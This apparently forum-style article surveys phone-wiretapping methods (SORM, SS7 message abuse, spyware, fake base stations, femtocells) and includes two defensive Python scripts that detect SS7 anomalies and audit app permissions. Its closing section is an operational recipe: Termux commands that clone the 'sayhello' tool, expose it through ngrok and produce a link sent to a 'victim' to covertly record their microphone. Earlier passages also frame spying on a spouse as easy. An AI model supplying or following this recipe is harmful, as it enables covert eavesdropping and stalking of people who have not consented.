9 ways to wiretap your phone

1. SORM - official wiretapping
The most obvious way is official wiretapping by the state.

In many parts of the world, telephone companies are required to provide access to wiretapping lines for the competent authorities. For example, in Russia, in practice, this is done technically through SORM - a system of technical means for ensuring the functions of operational-search measures.

Each operator must install an integrated SORM module on its PBX.


If a telecom operator has not installed equipment on its PBX for wiretapping the phones of all users, its license in Russia will be canceled. Similar programs of total wiretapping operate in Kazakhstan, Ukraine, the USA, Great Britain (Interception Modernization Program, Tempora) and other countries.

The venality of government officials and intelligence officers is well known to all. If they have access to the system in "god mode", then for a fee you can get it too. As in all state systems, in the Russian SORM there is a big mess and typical Russian carelessness. Most of the technicians are in fact very low-skilled, which allows unauthorized access to the system without being noticed by the intelligence services themselves.

Telecom operators do not control when, or which, subscribers are being listened to on SORM lines. The operator does not check in any way whether there is a court sanction for wiretapping a particular user.

"You take some criminal case about the investigation of an organized criminal group, which lists 10 numbers. You need to listen to a person who has nothing to do with this investigation. You simply add this number and say that you have operational information that this is the number of one of the leaders of the criminal group," say knowledgeable people from the site Agentura.ru.

Thus, through SORM, you can listen to anyone on a "legal" basis. So much for secure communications.

2. Wiretapping through the operator
Mobile operators can, without any difficulty, view the list of calls and the movement history of a mobile phone, which is registered at various base stations according to its physical location. To obtain call records, the operator needs to connect to the SORM system, just as the special services do.

Under the new Russian laws, operators will be required to store audio recordings of all users' conversations for between six months and three years (the exact period is still being negotiated). The law comes into force in 2018.

3. Connection to the SS7 signal network
Knowing the victim's number, it is possible to wiretap the phone by connecting to the network operator of the cellular network through vulnerabilities in the SS7 signaling protocol (Signaling System No. 7).


Security experts describe this technique as follows.

The attacker infiltrates the SS7 signaling network and sends over its channels a Send Routing Info For SM (SRI4SM) service message, specifying the telephone number of the attacked subscriber A as a parameter. In response, the home network of subscriber A sends the attacker some technical information: the IMSI (International Mobile Subscriber Identity) and the address of the MSC that is currently serving the subscriber.

Then the attacker, using the Insert Subscriber Data (ISD) message, injects an updated subscriber profile into the VLR database, changing the address of the billing system in it to the address of his pseudo-billing system. When the attacked subscriber then makes an outgoing call, his switch turns to the attacker's system instead of the real billing system, which gives the switch a directive to redirect the call to a third party, again controlled by the attacker. At this third party, a conference call is assembled from three subscribers, two of which are real (caller A and callee B), and the third is an unauthorized party controlled by the attacker, who can listen to and record the conversation.

The scheme works in practice. Experts say that when the SS7 signaling network was developed, it did not include mechanisms to protect against such attacks. The assumption was that the system was closed and protected from outside connections, but in practice an attacker can find a way to join this signaling network.

You can connect to the SS7 network in any country in the world, for example in a poor African country, and you will have access to the switches of all operators in Russia, the USA, Europe and other countries. This method allows you to listen to any subscriber in the world, even on the other side of the globe. Interception of incoming SMS from any subscriber is also trivial, as is transferring the balance via a USSD request (for more details, see the talk by Sergei Puzankov and Dmitry Kurbatov at the PHDays IV hacker conference).

4. Connect to cable
From the documents of Edward Snowden it became known that the special services not only "officially" wiretap phones through communication switches, but also connect directly to fiber, recording all traffic in its entirety. This allows wiretapping of foreign operators who do not allow the official installation of wiretapping equipment on their PBXs.

This is probably a fairly rare practice used for international espionage. Since telephone exchanges in Russia already have listening equipment everywhere, there is no particular need to connect to fiber. Perhaps this method only makes sense for intercepting and recording traffic in local networks at local PBXs, for example to record internal conversations in a company, if they are carried out within a local PBX or via VoIP.

5. Installing a spyware trojan
At the everyday level, the easiest way to listen to a user's conversations on a mobile phone, in Skype and other programs is to simply install a Trojan on his smartphone. This method is available to everyone; it does not require the powers of state special services or a court decision.

Abroad, law enforcement agencies often purchase special Trojans that use unknown 0day vulnerabilities in Android and iOS to install programs. Such Trojans are developed on commission from law enforcement agencies by companies such as Gamma Group (the FinFisher Trojan).

It makes little sense for Russian law enforcement agencies to install Trojans, unless they need the ability to activate the smartphone's microphone and record even when the user is not talking on the phone. In other cases, SORM copes with wiretapping. Therefore, the Russian special services are not very active in deploying Trojans. But for unofficial use, it is a favorite hacking tool.

Wives spy on their husbands, businessmen study the activities of competitors. In Russia, Trojan software is widely used for wiretapping by private clients.

The Trojan is installed on a smartphone in various ways: through a fake software update, through an email with a fake application, through a vulnerability in Android or in popular software such as iTunes.

New vulnerabilities in programs are found literally every day, and are then closed very slowly. For example, the FinFisher Trojan was installed through a vulnerability in iTunes that Apple did not close from 2008 to 2011. Through this hole, any software could be installed on the victim's computer on behalf of Apple.

Perhaps such a Trojan is already installed on your smartphone. Don't you think your smartphone battery has been discharging a little faster than expected lately?

6. Application update
Instead of installing a special spyware Trojan, an attacker can do something even smarter: choose an application that you yourself voluntarily install on your smartphone, and then grant it all the permissions it needs to access phone calls, record conversations, and transfer data to a remote server.

For example, it could be a popular game distributed through unofficial third-party app catalogs. At first glance, this is an ordinary game, but with the function of wiretapping and recording conversations. Very convenient. The user, with his own hands, allows the program to go online, where it sends the files with recorded conversations.

Alternatively, malicious application functionality can be added as an update.

7. Fake base station
The fake base station has a stronger signal than the real BS. Due to this, it intercepts the traffic of subscribers and allows you to manipulate data on the phone. It is known that fake base stations are widely used by law enforcement agencies abroad.

A fake BS model called StingRay is popular in the USA.


And not only law enforcement agencies use such devices. For example, merchants in China often use fake BSs to send mass spam to mobile phones within a radius of hundreds of meters. In general, the production of "fake cells" in China has been put on stream, so in local stores it is no problem to find such a device, assembled literally by hand.

8. Hacking femtocell
Recently, some companies have been using femtocells - low-power miniature cellular stations that intercept traffic from mobile phones that are in range. Such a femtocell allows you to record calls from all company employees before redirecting calls to the base station of cellular operators.

Accordingly, to wiretap a subscriber, you need to install your own femtocell or hack the operator's original femtocell.

9. Mobile complex for remote listening
In this case, a radio antenna is installed near the subscriber (it works at a range of up to 500 meters). A directional antenna connected to a computer intercepts all phone signals, and at the end of the work it is simply taken away.

Unlike a fake femtocell or a Trojan, an attacker does not need to worry about breaking into the site and installing a femtocell, and then removing it (or removing the Trojan without leaving any traces of hacking).

The capabilities of modern PCs are enough to record a GSM signal on a large number of frequencies and then break the encryption using rainbow tables (see the description of the technique by a well-known specialist in this field, Karsten Nohl).

If you voluntarily carry a universal bug with you, you automatically collect an extensive dossier on yourself. The only question is who will need this dossier. But if necessary, he can get it without much difficulty.
 

Is your phone tapped?




Many of the methods below are legitimate. But not all.

As a rule, if you are not doing anything illegal or are not under suspicion, then you will not be tapped. But this does not negate the chance of wiretapping by business competitors, criminals and other ill-wishers.

Just know all this information and sleep well.

SORM
The system of operational-search measures is an official, state, total wiretapping. In the Russian Federation, all telecom operators are required to install SORM on their automatic telephone exchanges and provide law enforcement agencies with access to user conversations and correspondence.

If the operator does not have SORM, it will not be issued a license. If it turns off SORM, the license is canceled. By the way, the same kind of system operates not only in neighboring Kazakhstan and Ukraine, but also in the USA, Great Britain and many other countries.

SORM is usually divided into three generations:
  • SORM 1 allows you to monitor analog communications, telephone conversations. It was developed in the 80s.
  • SORM 2 is designed to listen to mobile communications and control Internet traffic. The second generation of SORM was introduced in 2000. The system includes a separate server connected to the FSB control panel and a ring buffer that must store all traffic passing through the provider for the last 12 hours.
  • SORM 3 is the latest option that provides the integration of all the above systems and additionally controls some VPN servers, listens in real time to satellite communications, instant messengers, etc., stores metadata about calls, Internet sessions, transmitted messages, allows you to receive data from internal systems of the operator. SORM 3 began to be implemented in 2014.
Operators in the Russian Federation mainly use SORM 2. But in practice, at 70% of companies the system either does not work at all or works with violations.

First of all, it is expensive to install SORM (and the operator must do this for his own money according to an individual plan approved by the local FSB department). It is easier for most operators to pay a fine of about 30 thousand rubles in accordance with Part 3 of Article 14.1 of the Administrative Offenses Code of the Russian Federation.

In addition, the operator's SORM may conflict with the FSB complexes. And because of this, it is technically impossible to record user traffic.

Operators do not control how the secret services use SORM. Accordingly, they cannot prohibit listening to your specific number.

However, for wiretapping, the special services formally need a court decision. In 2016, courts of general jurisdiction issued 893.1 thousand such permits to law enforcement agencies. In 2017, their number decreased, but not significantly.

However, it doesn't cost law enforcement officers anything to include someone's number in a wiretap kit as potentially suspicious. And cite an operational need.

In addition, the SORM security level is often low. So, there remains an opportunity for unauthorized connection - invisible to the operator, subscriber and special services.

The operators themselves can also view the history of calls, messages, smartphone movements across base stations.



Signal network SS7 (SS-7)
SS7, OKS-7, or Signaling System No. 7, is a set of signaling protocols used to configure PSTN and PLMN telephone exchanges around the world. The protocols use digital and analog channels to transmit control information.

Vulnerabilities in SS7 are found regularly. This allows hackers to connect to the operator's network and eavesdrop on your phone. Generally speaking, SS7 practically did not have security systems built in - it was initially believed that it was protected by default.

Typically, hackers infiltrate the SS7 network and send a Send Routing Info For SM (SRI4SM) service message over its channels. It specifies the number to be tapped as a message parameter. In response, the subscriber's home network sends the IMSI (International Mobile Subscriber Identity) and the address of the MSC that is currently serving the subscriber.

After that, the hacker sends another message - Insert Subscriber Data (ISD). This allows him to penetrate the database and upload his address there instead of the subscriber's billing address.

When a subscriber makes a call, the switch refers to the hacker's address. As a result, a conference call is made with the participation of a third party (attacker), which can listen and record everything.

You can connect to SS7 from anywhere. So a Russian number may well be attacked from India or China, or even from distant hot Africa. By the way, SS7 allows USSD requests to be used to intercept SMS or transfer the balance.

In general, SS7 is the "mother of all holes" and the most vulnerable point of the mobile system. It is now used not only for wiretapping, but also for bypassing two-factor authentication. In other words, to access your bank accounts and other secured profiles.
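The SRI4SM-then-ISD sequence described in section 3 and again in the SS7 section above is something an operator can watch for at its interconnect, because Insert Subscriber Data is a message the home HLR sends to its own VLR and should not arrive from outside the home network (the kind of check GSMA's interconnect-monitoring guidance, FS.11, recommends). The following script is an added example, not code from the original post; the record format, the home and partner global-title prefixes and the log lines are all constructed for illustration.

```python
"""Detection heuristics for the SS7 MAP sequence described above, run over
constructed sample records (hypothetical key=value log format, not a real
STP export). Added example; not part of the original post."""
import re
from collections import defaultdict

# Assumptions (all made up for the example): home-network global titles start
# with HOME_GT_PREFIX, and TRUSTED_PARTNER_PREFIXES belong to roaming / SMS
# interworking partners that legitimately send SRI-for-SM.
HOME_GT_PREFIX = "7916"
TRUSTED_PARTNER_PREFIXES = ("49177", "33612")
CHAIN_WINDOW_SECONDS = 600  # how soon after an SRI4SM an ISD counts as a chain

KV_RE = re.compile(r"(\w+)=(\S+)")

# Constructed sample log: one MAP operation per line as seen at the home
# network's interconnect. ogt = originating global title, op = MAP operation.
SAMPLE_LOG = """\
ts=100 ogt=4917701111 op=SendRoutingInfoForSM msisdn=79161234567 imsi=250011234567890
ts=130 ogt=4917701111 op=MtForwardSM imsi=250011234567890
ts=200 ogt=2348051112222 op=SendRoutingInfoForSM msisdn=79167654321 imsi=250019876543210
ts=260 ogt=2348051112222 op=InsertSubscriberData imsi=250019876543210
ts=300 ogt=79160000001 op=InsertSubscriberData imsi=250011234567890
"""


def parse_line(line):
    """Parse one 'key=value ...' record into a dict; ts becomes an int."""
    fields = dict(KV_RE.findall(line))
    if "ts" in fields:
        fields["ts"] = int(fields["ts"])
    return fields


def is_home(gt):
    return gt.startswith(HOME_GT_PREFIX)


def is_trusted_partner(gt):
    return gt.startswith(TRUSTED_PARTNER_PREFIXES)


def analyse(log_text):
    """Return a list of (ts, origin_gt, rule) alerts, in log order."""
    alerts = []
    # imsi -> [(ts, origin_gt)] for SRI-for-SM lookups that revealed that IMSI
    recent_sri = defaultdict(list)
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        ts, ogt, op = ev["ts"], ev["ogt"], ev["op"]
        imsi = ev.get("imsi")
        if op == "SendRoutingInfoForSM":
            if imsi:
                recent_sri[imsi].append((ts, ogt))
            # SRI-for-SM from a node that is neither ours nor a known partner
            if not (is_home(ogt) or is_trusted_partner(ogt)):
                alerts.append((ts, ogt, "sri4sm_from_untrusted_gt"))
        elif op == "InsertSubscriberData":
            # ISD is HLR -> VLR inside the home network; a foreign origin is anomalous
            if not is_home(ogt):
                alerts.append((ts, ogt, "isd_from_foreign_gt"))
            # The described attack: the same origin first learns the IMSI via
            # SRI-for-SM, then pushes a profile for that IMSI shortly afterwards
            for sri_ts, sri_gt in recent_sri.get(imsi, []):
                if sri_gt == ogt and 0 <= ts - sri_ts <= CHAIN_WINDOW_SECONDS:
                    alerts.append((ts, ogt, "sri4sm_then_isd_chain"))
                    break
    return alerts


if __name__ == "__main__":
    for ts, ogt, rule in analyse(SAMPLE_LOG):
        print(f"t={ts} origin={ogt} {rule}")
```

In the constructed log, the German partner's SRI-for-SM followed by an MT-ForwardSM is ordinary SMS delivery and raises nothing, while the unknown origin that first looks up a subscriber and then injects a profile trips three rules. Real deployments would key partner trust on the full GT allowlist and on the SCCP calling party, not a prefix.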

Trojan Applications
This is simply the easiest and most common way. It is much easier to install the application while your other half is in the shower, or to use social engineering to make you follow a link, than to negotiate with the operatives and the FSB.

Applications allow you not only to record conversations on your mobile or read SMS. They can activate the microphone and camera to covertly listen and film everything that happens around them.

The most popular Trojan of this kind is FinFisher. In 2008-2011, it was installed on the iPhone through a hole in iTunes, which for some reason Apple did not close.

In 2011, the Egyptian government used FinFisher during the Arab Spring. Moreover, it acquired the official version for 287 thousand euros.

How can you be persuaded to install a spy for wiretapping? It can be an update of a popular game from an unofficial catalog, a discount application, or a fake system update.

By the way, law enforcement agencies also use spy apps, for example when they cannot go the official route and obtain court permission. Trojans for 0day vulnerabilities in Android and iOS are a multimillion-dollar market, and products based on them are in demand in many countries of the world.
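Sections 5 and 6 and the "Trojan Applications" section above both come down to the same thing: the user grants an app the permissions that let it capture audio, calls or SMS and send them off the device. The script below is an added example, not the post's own code, showing how a defender would audit an app inventory for that combination of capabilities and for sideloading; the inventory format, package names and installer values are constructed for the example (only the permission name strings are real Android ones).

```python
"""Audit an Android app inventory for spyware-like permission combinations.
Added example; not part of the original post. The inventory format below is
constructed (one app per line, key=value fields); the permission names are
real Android permission identifiers."""
import re

KV_RE = re.compile(r"(\w+)=(\S+)")

# Permissions that give access to something worth exfiltrating.
SENSITIVE = {
    "android.permission.RECORD_AUDIO": "microphone",
    "android.permission.CAMERA": "camera",
    "android.permission.READ_CALL_LOG": "call log",
    "android.permission.READ_SMS": "sms",
    "android.permission.ACCESS_FINE_LOCATION": "location",
}
NETWORK = "android.permission.INTERNET"
PERSIST = "android.permission.RECEIVE_BOOT_COMPLETED"
PLAY_STORE = "com.android.vending"  # installer package of Google Play

# Constructed inventory: a flashlight from the store, a sideloaded "game" with
# exactly the capabilities the post describes, and a legitimate chat app.
SAMPLE_INVENTORY = """\
package=com.example.flashlight installer=com.android.vending perms=android.permission.CAMERA
package=com.example.puzzle installer=unknown perms=android.permission.RECORD_AUDIO,android.permission.INTERNET,android.permission.READ_CALL_LOG,android.permission.RECEIVE_BOOT_COMPLETED
package=com.example.chat installer=com.android.vending perms=android.permission.RECORD_AUDIO,android.permission.INTERNET,android.permission.CAMERA
"""


def parse_inventory(text):
    """Yield dicts with package, installer and a set of granted permissions."""
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(KV_RE.findall(line))
        yield {
            "package": fields["package"],
            "installer": fields.get("installer", "unknown"),
            "perms": set(fields.get("perms", "").split(",")) - {""},
        }


def assess_app(app):
    """Classify one app by what it could capture and send off the device."""
    perms = app["perms"]
    # Data sources the app could read *and* ship out over the network.
    exfil = sorted(name for p, name in SENSITIVE.items()
                   if p in perms and NETWORK in perms)
    sideloaded = app["installer"] != PLAY_STORE
    persistent = PERSIST in perms
    if not exfil:
        severity = "none"
    elif sideloaded or persistent:
        severity = "high"    # capability plus an unofficial source or auto-start
    else:
        severity = "medium"  # capability alone; may be legitimate (chat app)
    return {
        "package": app["package"],
        "exfil": exfil,
        "sideloaded": sideloaded,
        "persistent": persistent,
        "severity": severity,
    }


def audit(text):
    """Return assessments sorted so the riskiest apps come first."""
    order = {"high": 0, "medium": 1, "none": 2}
    results = [assess_app(a) for a in parse_inventory(text)]
    return sorted(results, key=lambda r: (order[r["severity"]], r["package"]))


if __name__ == "__main__":
    for r in audit(SAMPLE_INVENTORY):
        print(f'{r["severity"]:6} {r["package"]} exfil={r["exfil"]} '
              f'sideloaded={r["sideloaded"]} boot={r["persistent"]}')
```

The point of the combination rule is that a microphone permission by itself is unremarkable (every voice-chat app has one); microphone plus network plus auto-start on a package that did not come from the store is the profile of the "game from an unofficial catalog" the post describes. On a real device the same fields can be obtained from the package manager; the parser here only exists so the example runs offline.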

Remote wiretapping
There are three options here - a mobile complex, a femtocell, or a fake base station. All of them are not cheap, so the average user will not be listened to like that. But still, we will tell you how it works.

The mobile complex is installed at a distance of up to 300-500 m from the smartphone being listened to. A directional antenna intercepts all signals, and the computer stores and decodes them using rainbow tables or other techniques. When the wiretapping is over, the complex is simply driven away.

The fake base station (IMSI interceptor) has a stronger signal than the real one. The smartphone sees that such a station will provide the best communication quality and automatically connects to it. The station intercepts all data. The station is slightly larger than a laptop. It costs from $600 (handicraft) to $1500-2000 (industrial versions).

By the way, fake stations are often used to send spam. In China, such devices are assembled by craftsmen and sold to companies that want to attract buyers. Often, counterfeit BSs are used in areas of hostilities to misinform the military or the population.

A femtocell is a smaller device. It is not as powerful as a full-fledged communication station, but it performs the same functions. Femtocells are usually installed by companies to listen to the traffic of their employees and partners. The data is intercepted before it is sent to the base stations of cellular operators. But the same femtocell can be installed for targeted wiretapping.



Findings
Technically, the easiest and most versatile way of wiretapping is a mobile application. If anything happens, everything can be blamed on the subscriber: after all, he himself allowed access to the camera, microphone, data transfer, etc. The rest of the methods are more for professionals or for people who can pay for the services of professionals.

This article is presented for informational purposes only and does not constitute a call to action.
 
Putting a powerful wiretap on someone else's phone
This article is presented for informational purposes only and does not carry a call to action.

Let's get started:

1.
Code:
• pkg upgrade
• pkg upgrade
• pkg install git
• pkg install php
• git clone https://github.com/thelinuxchoice/sayhello
• git clone https://github.com/Marcel0Sousa/termux-ngrok
• cd termux-ngrok
• ./termux-ngrok.sh (after that, write Y)
• cd
• cd usr
• cd bin
• cp ngrok /data/data/com.termux/files/home/sayhello/
• cd sayhello
• chmod +x sayhello.sh
• ./sayhello.sh

2. After that, you will open "sayHello".
Select Ngrok-02 in it, and after a couple of seconds the link we need will be generated (in the screenshot it is circled in a red oval). It will need to be sent to the victim, and if she allows access to the microphone, "Audio file received" will be written in Termux.

3. To transfer audio to the internal memory, write:
Code:
• termux-setup-storage
• cp (name of the audio file; you can see the name by writing ls) /storage/emulated/0/

After that, the audio files will be saved in .wav format, and you can find them in the internal memory.
 